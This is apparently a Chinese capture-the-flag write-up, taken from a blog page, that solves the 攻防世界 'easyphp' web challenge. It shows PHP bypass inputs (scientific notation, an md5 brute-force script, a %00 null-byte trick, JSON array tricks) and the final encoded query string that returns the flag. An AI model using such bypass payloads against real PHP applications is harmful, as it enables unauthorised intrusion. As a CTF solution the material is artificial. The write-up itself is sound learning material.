第一步,用科学计数法绕过 a=1e9

if(isset($a) && intval($a) > 6000000 && strlen($a) <= 3)#$a=1e9

第二步,用php代码编写md5碰撞脚本得到b=53724

<?php
for ($i = 1; $i < 100000; $i++) {if('8b184b' === substr(md5($i),-6,6)){echo($i);}
}
?>

第三步,绕过is_numeric函数

$c=(array)json_decode(@$_GET['c']); #接收json格式的字符串并将其转化为数组c={"m":"2033%00"}#使用%00可以绕过is_numeric函数

第四步,绕过is_array函数

c={"m":"2033%00","n":[[1]]}

第五步,绕过array_search函数

c={"m":"2033%00","n":[[0,2],0]}#对{"m":"2033%00","n":[[0,2],0]}进行url编码得到:
%7B%22m%22%3A%222033%2500%22%2C%22n%22%3A%5B%5B1%5D%2C0%5D%7D

一定要对传值url编码

?a=1e9&b=53724&c=%7B%22m%22%3A%222033%2500%22%2C%22n%22%3A%5B%5B1%5D%2C0%5D%7D

提交得到flag

参考文章

攻防世界ctf web easyphp题解wp_中原第一高手的博客-CSDN博客

攻防世界easyphp解题wp相关推荐

  1. 攻防世界mfw解题wp

    开始点点点发现php源码,bootstrap写的,好像还有git备份,猜测git源码泄露 然后用dirbuster扫一下目录 python .\dirsearch.py -u "http:/ ...

  2. 【ics-05 | mfw】攻防世界CTF题WP

    攻防世界CTF题WP ics-05 所需知识 解题步骤 学习知识 php伪协议(文件包含漏洞中使用) preg_place函数 mfw 所需知识 解题步骤 学习知识 Dirserach工具 GitHa ...

  3. [CTF/网络安全]攻防世界unserialize3解题详析及php序列化反序列化实例讲解

    [CTF/网络安全]攻防世界unserialize3解题详析及php序列化反序列化实例讲解 _wakeup()及php序列化反序列化 序列化字符串结构分析 _wakeup()的利用 解题思路 伪属性数 ...

  4. [CTF/网络安全] 攻防世界 php_rce 解题详析

    [CTF/网络安全] 攻防世界 php_rce 解题详析 PHP REC ThinkPHP V5漏洞Payload 姿势 总结 PHP REC PHP RCE 指的是通过远程代码执行漏洞(Remote ...

  5. 攻防世界 crypto入门WP

    攻防世界 crypto入门WP 前言 下学期要求密码和Re,现在这俩几乎是空白,趁着暑假的功夫,最近也能闲下来,就学一学crypto,其实真正接触发现挺有意思的,各种密码的加密千奇百怪,层出不穷,也是 ...

  6. python小记--攻防世界simple_js解题脚本编写

    目录 \x格式十六转十进制 十进制转换ASCII值 \x格式十六转十进制 对应攻防世界web新手题simple_js 查看网页源代码之后看到了一串\x开头的数据 \x35\x35\x2c\x35\x3 ...

  7. Wirte-up:攻防世界Web解题过程新手区01-06

    文章更新于:2020-02-18 说明:为了标识图片边界,有些图片加了红线以增强观感. 注1: web 环境搭建参见: Windows&linux使用集成环境搭建 web 服务器 注2:DVW ...

  8. 攻防世界 upload1 解题思路

    进入题目 看到文件上传,那么肯定第一想法就是想的传一个木马上去.写好保存 提示说要提交图片文件,因为以弹窗的形式且反应速度较快,那么我猜测它是前端检测文件,所以我们可以先用bp绕过试一试,不行我们在用 ...

  9. 攻防世界 easy-dex解题思路

    零.前言 这道题包含的知识感觉还挺多的,基本上是解出一步卡一步,然后不停的百度,看文章分析,才慢慢的摸索出来,首先是第一次接触到纯native开发的app这种东西,知道了其AXML大概的写法,以及SO ...

  10. 攻防世界-easyphp

    题目 访问url进入靶场,阅读php代码 <?php highlight_file(__FILE__); $key1 = 0;//值赋值 $key2 = 0;$a = $_GET['a'];// ...

最新文章

  1. android 多版本打包,Android build.gradle版本名打包配置的方法
  2. 基于深度学习的花卉图像关键点检测
  3. 是否是一个新的机会?
  4. 光耦在短距离通信中的应用
  5. java中sql语句怎么把开始和结束时间作为参数写sql查询_聊一聊MyBatis 和 SQL 注入间的恩恩怨怨
  6. 搭建空的maven多模块项目架构并且上传到远程git仓库(超详细 cmd命令版本)
  7. android 速度传感器,Android实战技巧之四十二:加速度传感器
  8. [投稿]谱减法语音降噪原理
  9. Phalanger 【Php on .net】
  10. Atitit mybatis快速开发 的sql api接口
  11. 卸载干净ARCGIS不用手动删注册表,一键用GEEK
  12. 玩转3D全息图像!AI即刻生成
  13. JAVA商城项目(微服务框架)——第4天 乐优商城项目搭建
  14. 电压负反馈放大电路(基于三极管)
  15. VS2019 配色_新手设计师如何做好设计配色
  16. 既不是研发顶尖高手,也不是销售大牛,为何偏偏获得2万RMB的首个涛思文化奖?...
  17. python网易云听歌时长_用Python爬取10w条网易云音乐热评并进行分析的方法总结
  18. 网页上的双语切换(java+jsp/html)
  19. 陈子豪mc虚无世界java_我的世界虚无世界2.5陈子豪整合包
  20. matlab怎么求反馈增益矩阵,反馈增益矩阵状态反馈闭环传递函数矩阵为.PPT

热门文章

  1. SpringBoot 整合 Elasticsearch 实现海量级数据搜索
  2. 除了方文山,用TA你也能帮周杰伦写歌词了
  3. JavaWeb开发QQ动态表情-源文件
  4. 纯css按钮代码,纯CSS实现3D按钮效果实例代码
  5. css3 实现按钮点击动画效果(加工)
  6. java高速公路系统_基于jsp的高速公路收费系统-JavaEE实现高速公路收费系统 - java项目源码...
  7. sentence_transformers 微调模型
  8. Ireport 子报表分页
  9. 获得与回馈丨点评中国两大金融机构基于OpenStack的网络联合实践
  10. centos linux 查看ip,centos如何查看ip